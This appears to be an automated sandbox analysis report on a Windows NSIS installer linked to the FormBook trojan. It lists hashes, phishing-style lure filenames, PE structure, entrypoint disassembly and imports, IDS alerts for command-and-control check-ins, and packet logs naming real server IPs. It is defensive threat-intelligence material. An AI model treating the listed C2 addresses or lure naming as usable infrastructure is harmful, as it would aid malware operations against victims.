                                                                                                              SSDEEP:192:xPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4v:g7VpNo8gmOyRsVc4
                                                                                                              MD5:FCCFF8CB7A1067E23FD2E2B63971A8E1
                                                                                                              SHA1:30E2A9E137C1223A78A0F7B0BF96A1C361976D91
                                                                                                              SHA-256:6FCEA34C8666B06368379C6C402B5321202C11B00889401C743FB96C516C679E
                                                                                                              SHA-512:F4335E84E6F8D70E462A22F1C93D2998673A7616C868177CAC3E8784A3BE1D7D0BB96F2583FA0ED82F4F2B6B8F5D9B33521C279A42E055D80A94B4F3F1791E0C
                                                                                                              Malicious:false
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                              Joe Sandbox View:
                                                                                                              • Filename: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, Detection: malicious, Browse
                                                                                                              • Filename: 3arZKnr21W.exe, Detection: malicious, Browse
                                                                                                              • Filename: Shipping receipt.exe, Detection: malicious, Browse
                                                                                                              • Filename: New Order TL273723734533.pdf.exe, Detection: malicious, Browse
                                                                                                              • Filename: YZ8OvkljWm.exe, Detection: malicious, Browse
                                                                                                              • Filename: U03c2doc.exe, Detection: malicious, Browse
                                                                                                              • Filename: QUOTE061021.exe, Detection: malicious, Browse
                                                                                                              • Filename: PAYMENT CONFIRMATION.exe, Detection: malicious, Browse
                                                                                                              • Filename: PO187439.exe, Detection: malicious, Browse
                                                                                                              • Filename: 090009000000090.exe, Detection: malicious, Browse
                                                                                                              • Filename: NEWORDERLIST.exe, Detection: malicious, Browse
                                                                                                              • Filename: 00404000004.exe, Detection: malicious, Browse
                                                                                                              • Filename: 40900900090000.exe, Detection: malicious, Browse
                                                                                                              • Filename: INVO090090202.exe, Detection: malicious, Browse
                                                                                                              • Filename: SecuriteInfo.com.W32.Injector.AIC.genEldorado.29599.exe, Detection: malicious, Browse
                                                                                                              • Filename: D1E3656B4E1C609B2540CFF74F59319A52D7FABF4CC51.exe, Detection: malicious, Browse
                                                                                                              • Filename: D1E3656B4E1C609B2540CFF74F59319A52D7FABF4CC51.exe, Detection: malicious, Browse
                                                                                                              • Filename: SecuriteInfo.com.Variant.Bulz.383129.23206.exe, Detection: malicious, Browse
                                                                                                              • Filename: SecuriteInfo.com.Variant.Bulz.383129.29566.exe, Detection: malicious, Browse
                                                                                                              • Filename: ASAI-LiveCage-Client-Full_Installer-NSS-B-1.5.2.0005 (1).exe, Detection: malicious, Browse
                                                                                                              Reputation:moderate, very likely benign file
                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L.....$_...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                              Static File Info

                                                                                                              General

                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                              Entropy (8bit):7.912934279663738
                                                                                                              TrID:
                                                                                                              • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                                                              • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                              File name:UGGJ4NnzFz.exe
                                                                                                              File size:223620
                                                                                                              MD5:b148ae414eb8a1b34a15cdb32c21f9ee
                                                                                                              SHA1:25b78f76010cc34843352c78d4f8e07a28b46b32
                                                                                                              SHA256:193788545c12c697fe660e9dd178e5d97478d5b90d5b0096f1cd6a9b641d48e9
                                                                                                              SHA512:9f6efbfdd1ab7bed6e0efcff882fd05816c0cbb6b413abce562f1ab6c8adbfa2d86610299be8d399ba36a305b64cadc762806eaa4c647d9b04fd457ec1537d0a
                                                                                                              SSDEEP:6144:Ds9G4RsUIfpwRmZfqJxbx3jjTQeGYWAaE:yG45IfpTIxV3jHQeGYn
                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................\.........

                                                                                                              File Icon

                                                                                                              Icon Hash:b2a88c96b2ca6a72

                                                                                                              Static PE Info

                                                                                                              General

                                                                                                              Entrypoint:0x40323c
                                                                                                              Entrypoint Section:.text
                                                                                                              Digitally signed:false
                                                                                                              Imagebase:0x400000
                                                                                                              Subsystem:windows gui
                                                                                                              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                                              DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                              Time Stamp:0x4B1AE3C6 [Sat Dec 5 22:50:46 2009 UTC]
                                                                                                              TLS Callbacks:
                                                                                                              CLR (.Net) Version:
                                                                                                              OS Version Major:4
                                                                                                              OS Version Minor:0
                                                                                                              File Version Major:4
                                                                                                              File Version Minor:0
                                                                                                              Subsystem Version Major:4
                                                                                                              Subsystem Version Minor:0
                                                                                                              Import Hash:099c0646ea7282d232219f8807883be0

                                                                                                              Entrypoint Preview

                                                                                                              Instruction
                                                                                                              sub esp, 00000180h
                                                                                                              push ebx
                                                                                                              push ebp
                                                                                                              push esi
                                                                                                              xor ebx, ebx
                                                                                                              push edi
                                                                                                              mov dword ptr [esp+18h], ebx
                                                                                                              mov dword ptr [esp+10h], 00409130h
                                                                                                              xor esi, esi
                                                                                                              mov byte ptr [esp+14h], 00000020h
                                                                                                              call dword ptr [00407030h]
                                                                                                              push 00008001h
                                                                                                              call dword ptr [004070B4h]
                                                                                                              push ebx
                                                                                                              call dword ptr [0040727Ch]
                                                                                                              push 00000008h
                                                                                                              mov dword ptr [00423F58h], eax
                                                                                                              call 00007F1588A77B6Eh
                                                                                                              mov dword ptr [00423EA4h], eax
                                                                                                              push ebx
                                                                                                              lea eax, dword ptr [esp+34h]
                                                                                                              push 00000160h
                                                                                                              push eax
                                                                                                              push ebx
                                                                                                              push 0041F458h
                                                                                                              call dword ptr [00407158h]
                                                                                                              push 004091B8h
                                                                                                              push 004236A0h
                                                                                                              call 00007F1588A77821h
                                                                                                              call dword ptr [004070B0h]
                                                                                                              mov edi, 00429000h
                                                                                                              push eax
                                                                                                              push edi
                                                                                                              call 00007F1588A7780Fh
                                                                                                              push ebx
                                                                                                              call dword ptr [0040710Ch]
                                                                                                              cmp byte ptr [00429000h], 00000022h
                                                                                                              mov dword ptr [00423EA0h], eax
                                                                                                              mov eax, edi
                                                                                                              jne 00007F1588A74F6Ch
                                                                                                              mov byte ptr [esp+14h], 00000022h
                                                                                                              mov eax, 00429001h
                                                                                                              push dword ptr [esp+14h]
                                                                                                              push eax
                                                                                                              call 00007F1588A77302h
                                                                                                              push eax
                                                                                                              call dword ptr [0040721Ch]
                                                                                                              mov dword ptr [esp+1Ch], eax
                                                                                                              jmp 00007F1588A74FC5h
                                                                                                              cmp cl, 00000020h
                                                                                                              jne 00007F1588A74F68h
                                                                                                              inc eax
                                                                                                              cmp byte ptr [eax], 00000020h
                                                                                                              je 00007F1588A74F5Ch
                                                                                                              cmp byte ptr [eax], 00000022h
                                                                                                              mov byte ptr [eax+eax+00h], 00000000h

                                                                                                              Rich Headers

                                                                                                              Programming Language:
                                                                                                              • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                              Data Directories

                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x73a40xb4.rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x2c0000x9e0.rsrc
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x70000x28c.rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                              Sections

                                                                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                              .text0x10000x5a5a0x5c00False0.660453464674data6.41769823686IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                              .rdata0x70000x11900x1200False0.4453125data5.18162709925IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                              .data0x90000x1af980x400False0.55859375data4.70902740305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                              .ndata0x240000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                              .rsrc0x2c0000x9e00xa00False0.45625data4.51012867721IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                              Resources

                                                                                                              NameRVASizeTypeLanguageCountry
                                                                                                              RT_ICON0x2c1900x2e8dataEnglishUnited States
                                                                                                              RT_DIALOG0x2c4780x100dataEnglishUnited States
                                                                                                              RT_DIALOG0x2c5780x11cdataEnglishUnited States
                                                                                                              RT_DIALOG0x2c6980x60dataEnglishUnited States
                                                                                                              RT_GROUP_ICON0x2c6f80x14dataEnglishUnited States
                                                                                                              RT_MANIFEST0x2c7100x2ccXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                                                              Imports

                                                                                                              DLLImport
                                                                                                              KERNEL32.dllCompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
                                                                                                              USER32.dllEndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                                                                                              GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                                                                                              SHELL32.dllSHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                                                                                              ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                                                                                              COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                              ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                                              VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                                                                                              Possible Origin

                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                              EnglishUnited States

                                                                                                              Network Behavior

                                                                                                              Snort IDS Alerts

                                                                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                              06/10/21-14:36:46.806513TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974180192.168.2.334.102.136.180
                                                                                                              06/10/21-14:36:46.806513TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974180192.168.2.334.102.136.180
                                                                                                              06/10/21-14:36:46.806513TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974180192.168.2.334.102.136.180
                                                                                                              06/10/21-14:36:46.947381TCP1201ATTACK-RESPONSES 403 Forbidden804974134.102.136.180192.168.2.3
                                                                                                              06/10/21-14:36:52.333303TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974380192.168.2.3157.245.232.77
                                                                                                              06/10/21-14:36:52.333303TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974380192.168.2.3157.245.232.77
                                                                                                              06/10/21-14:36:52.333303TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974380192.168.2.3157.245.232.77
                                                                                                              06/10/21-14:36:57.655557TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974480192.168.2.323.227.38.74
                                                                                                              06/10/21-14:36:57.655557TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974480192.168.2.323.227.38.74
                                                                                                              06/10/21-14:36:57.655557TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974480192.168.2.323.227.38.74
                                                                                                              06/10/21-14:36:57.730741TCP1201ATTACK-RESPONSES 403 Forbidden804974423.227.38.74192.168.2.3
                                                                                                              06/10/21-14:37:18.660568TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974780192.168.2.362.149.128.40
                                                                                                              06/10/21-14:37:18.660568TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974780192.168.2.362.149.128.40
                                                                                                              06/10/21-14:37:18.660568TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974780192.168.2.362.149.128.40
                                                                                                              06/10/21-14:37:34.273370TCP1201ATTACK-RESPONSES 403 Forbidden804975034.102.136.180192.168.2.3

                                                                                                              Network Port Distribution

                                                                                                              TCP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Jun 10, 2021 14:36:41.414776087 CEST4973580192.168.2.3165.22.38.5
                                                                                                              Jun 10, 2021 14:36:41.542696953 CEST8049735165.22.38.5192.168.2.3
                                                                                                              Jun 10, 2021 14:36:41.542872906 CEST4973580192.168.2.3165.22.38.5
                                                                                                              Jun 10, 2021 14:36:41.543024063 CEST4973580192.168.2.3165.22.38.5
                                                                                                              Jun 10, 2021 14:36:41.670629025 CEST8049735165.22.38.5192.168.2.3
                                                                                                              Jun 10, 2021 14:36:41.674711943 CEST8049735165.22.38.5192.168.2.3
                                                                                                              Jun 10, 2021 14:36:41.674747944 CEST8049735165.22.38.5192.168.2.3
                                                                                                              Jun 10, 2021 14:36:41.674931049 CEST4973580192.168.2.3165.22.38.5
                                                                                                              Jun 10, 2021 14:36:41.675261974 CEST4973580192.168.2.3165.22.38.5
                                                                                                              Jun 10, 2021 14:36:41.802669048 CEST8049735165.22.38.5192.168.2.3
                                                                                                              Jun 10, 2021 14:36:46.763731956 CEST4974180192.168.2.334.102.136.180
                                                                                                              Jun 10, 2021 14:36:46.806230068 CEST804974134.102.136.180192.168.2.3
                                                                                                              Jun 10, 2021 14:36:46.806391954 CEST4974180192.168.2.334.102.136.180
                                                                                                              Jun 10, 2021 14:36:46.806513071 CEST4974180192.168.2.334.102.136.180
                                                                                                              Jun 10, 2021 14:36:46.848884106 CEST804974134.102.136.180192.168.2.3
                                                                                                              Jun 10, 2021 14:36:46.947381020 CEST804974134.102.136.180192.168.2.3
                                                                                                              Jun 10, 2021 14:36:46.947462082 CEST804974134.102.136.180192.168.2.3
                                                                                                              Jun 10, 2021 14:36:46.947693110 CEST4974180192.168.2.334.102.136.180
                                                                                                              Jun 10, 2021 14:36:46.992661953 CEST804974134.102.136.180192.168.2.3
                                                                                                              Jun 10, 2021 14:36:52.134191990 CEST4974380192.168.2.3157.245.232.77
                                                                                                              Jun 10, 2021 14:36:52.332736015 CEST8049743157.245.232.77192.168.2.3
                                                                                                              Jun 10, 2021 14:36:52.333158970 CEST4974380192.168.2.3157.245.232.77
                                                                                                              Jun 10, 2021 14:36:52.333302975 CEST4974380192.168.2.3157.245.232.77
                                                                                                              Jun 10, 2021 14:36:52.531209946 CEST8049743157.245.232.77192.168.2.3
                                                                                                              Jun 10, 2021 14:36:52.531318903 CEST8049743157.245.232.77192.168.2.3
                                                                                                              Jun 10, 2021 14:36:52.531372070 CEST8049743157.245.232.77192.168.2.3
                                                                                                              Jun 10, 2021 14:36:52.531611919 CEST4974380192.168.2.3157.245.232.77
                                                                                                              Jun 10, 2021 14:36:52.531677008 CEST4974380192.168.2.3157.245.232.77
                                                                                                              Jun 10, 2021 14:36:52.729552984 CEST8049743157.245.232.77192.168.2.3
                                                                                                              Jun 10, 2021 14:36:57.611773014 CEST4974480192.168.2.323.227.38.74
                                                                                                              Jun 10, 2021 14:36:57.655070066 CEST804974423.227.38.74192.168.2.3
                                                                                                              Jun 10, 2021 14:36:57.655231953 CEST4974480192.168.2.323.227.38.74
                                                                                                              Jun 10, 2021 14:36:57.655556917 CEST4974480192.168.2.323.227.38.74
                                                                                                              Jun 10, 2021 14:36:57.697685003 CEST804974423.227.38.74192.168.2.3
                                                                                                              Jun 10, 2021 14:36:57.730741024 CEST804974423.227.38.74192.168.2.3
                                                                                                              Jun 10, 2021 14:36:57.730763912 CEST804974423.227.38.74192.168.2.3
                                                                                                              Jun 10, 2021 14:36:57.730776072 CEST804974423.227.38.74192.168.2.3
                                                                                                              Jun 10, 2021 14:36:57.730788946 CEST804974423.227.38.74192.168.2.3
                                                                                                              Jun 10, 2021 14:36:57.730799913 CEST804974423.227.38.74192.168.2.3
                                                                                                              Jun 10, 2021 14:36:57.730808020 CEST804974423.227.38.74192.168.2.3
                                                                                                              Jun 10, 2021 14:36:57.730911016 CEST804974423.227.38.74192.168.2.3
                                                                                                              Jun 10, 2021 14:36:57.730973005 CEST4974480192.168.2.323.227.38.74
                                                                                                              Jun 10, 2021 14:36:57.731034040 CEST4974480192.168.2.323.227.38.74
                                                                                                              Jun 10, 2021 14:36:57.731090069 CEST4974480192.168.2.323.227.38.74
                                                                                                              Jun 10, 2021 14:37:18.590595007 CEST4974780192.168.2.362.149.128.40
                                                                                                              Jun 10, 2021 14:37:18.660319090 CEST804974762.149.128.40192.168.2.3
                                                                                                              Jun 10, 2021 14:37:18.660419941 CEST4974780192.168.2.362.149.128.40
                                                                                                              Jun 10, 2021 14:37:18.660567999 CEST4974780192.168.2.362.149.128.40
                                                                                                              Jun 10, 2021 14:37:18.730734110 CEST804974762.149.128.40192.168.2.3
                                                                                                              Jun 10, 2021 14:37:18.730801105 CEST804974762.149.128.40192.168.2.3
                                                                                                              Jun 10, 2021 14:37:18.730845928 CEST804974762.149.128.40192.168.2.3
                                                                                                              Jun 10, 2021 14:37:18.730884075 CEST804974762.149.128.40192.168.2.3
                                                                                                              Jun 10, 2021 14:37:18.730901003 CEST4974780192.168.2.362.149.128.40
                                                                                                              Jun 10, 2021 14:37:18.731070042 CEST4974780192.168.2.362.149.128.40
                                                                                                              Jun 10, 2021 14:37:18.731112957 CEST4974780192.168.2.362.149.128.40
                                                                                                              Jun 10, 2021 14:37:18.800710917 CEST804974762.149.128.40192.168.2.3
                                                                                                              Jun 10, 2021 14:37:28.911634922 CEST4974980192.168.2.3160.153.136.3
                                                                                                              Jun 10, 2021 14:37:28.963741064 CEST8049749160.153.136.3192.168.2.3
                                                                                                              Jun 10, 2021 14:37:28.963879108 CEST4974980192.168.2.3160.153.136.3
                                                                                                              Jun 10, 2021 14:37:28.964153051 CEST4974980192.168.2.3160.153.136.3
                                                                                                              Jun 10, 2021 14:37:29.016647100 CEST8049749160.153.136.3192.168.2.3
                                                                                                              Jun 10, 2021 14:37:29.018930912 CEST8049749160.153.136.3192.168.2.3
                                                                                                              Jun 10, 2021 14:37:29.018975019 CEST8049749160.153.136.3192.168.2.3
                                                                                                              Jun 10, 2021 14:37:29.019244909 CEST4974980192.168.2.3160.153.136.3
                                                                                                              Jun 10, 2021 14:37:29.019284010 CEST4974980192.168.2.3160.153.136.3
                                                                                                              Jun 10, 2021 14:37:29.071325064 CEST8049749160.153.136.3192.168.2.3
                                                                                                              Jun 10, 2021 14:37:34.093084097 CEST4975080192.168.2.334.102.136.180
                                                                                                              Jun 10, 2021 14:37:34.135099888 CEST804975034.102.136.180192.168.2.3
                                                                                                              Jun 10, 2021 14:37:34.135303020 CEST4975080192.168.2.334.102.136.180
                                                                                                              Jun 10, 2021 14:37:34.135488033 CEST4975080192.168.2.334.102.136.180
                                                                                                              Jun 10, 2021 14:37:34.177417040 CEST804975034.102.136.180192.168.2.3
                                                                                                              Jun 10, 2021 14:37:34.273370028 CEST804975034.102.136.180192.168.2.3
                                                                                                              Jun 10, 2021 14:37:34.273396015 CEST804975034.102.136.180192.168.2.3
                                                                                                              Jun 10, 2021 14:37:34.273545980 CEST4975080192.168.2.334.102.136.180
                                                                                                              Jun 10, 2021 14:37:34.273617983 CEST4975080192.168.2.334.102.136.180
                                                                                                              Jun 10, 2021 14:37:34.315685034 CEST804975034.102.136.180192.168.2.3

                                                                                                              UDP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Jun 10, 2021 14:35:21.540608883 CEST5128153192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:35:21.600243092 CEST53512818.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:35:22.433522940 CEST4919953192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:35:22.503585100 CEST53491998.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:35:22.984400988 CEST5062053192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:35:23.043394089 CEST53506208.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:35:24.092315912 CEST6493853192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:35:24.148153067 CEST53649388.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:35:25.223495960 CEST6015253192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:35:25.276424885 CEST53601528.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:35:26.553495884 CEST5754453192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:35:26.597443104 CEST5598453192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:35:26.603411913 CEST53575448.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:35:26.657538891 CEST53559848.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:35:27.724009991 CEST6418553192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:35:27.774061918 CEST53641858.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:35:28.972966909 CEST6511053192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:35:29.026110888 CEST53651108.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:35:30.129262924 CEST5836153192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:35:30.179409981 CEST53583618.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:35:31.364945889 CEST6349253192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:35:31.420346022 CEST53634928.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:35:32.636611938 CEST6083153192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:35:32.691618919 CEST53608318.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:35:34.212727070 CEST6010053192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:35:34.267724037 CEST53601008.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:35:36.113869905 CEST5319553192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:35:36.163959980 CEST53531958.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:35:37.237287998 CEST5014153192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:35:37.287698984 CEST53501418.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:35:38.392787933 CEST5302353192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:35:38.443218946 CEST53530238.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:35:39.536595106 CEST4956353192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:35:39.586926937 CEST53495638.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:35:40.697844982 CEST5135253192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:35:40.747873068 CEST53513528.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:35:42.170535088 CEST5934953192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:35:42.220783949 CEST53593498.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:35:43.288001060 CEST5708453192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:35:43.338124990 CEST53570848.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:35:44.681548119 CEST5882353192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:35:44.731674910 CEST53588238.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:35:46.385086060 CEST5756853192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:35:46.443718910 CEST53575688.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:35:56.603996038 CEST5054053192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:35:56.666836023 CEST53505408.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:36:01.849566936 CEST5436653192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:36:01.908924103 CEST53543668.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:36:17.098634958 CEST5303453192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:36:17.161837101 CEST53530348.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:36:18.515304089 CEST5776253192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:36:18.575824022 CEST53577628.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:36:36.123982906 CEST5543553192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:36:36.328604937 CEST53554358.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:36:41.350483894 CEST5071353192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:36:41.411506891 CEST53507138.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:36:42.922017097 CEST5613253192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:36:42.992693901 CEST53561328.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:36:46.694658995 CEST5898753192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:36:46.762590885 CEST53589878.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:36:49.087750912 CEST5657953192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:36:49.155028105 CEST53565798.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:36:51.983397007 CEST6063353192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:36:52.132129908 CEST53606338.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:36:57.543658018 CEST6129253192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:36:57.609603882 CEST53612928.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:37:02.747368097 CEST6361953192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:37:02.922837019 CEST53636198.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:37:13.404011965 CEST6493853192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:37:13.486615896 CEST53649388.8.8.8192.168.2.3
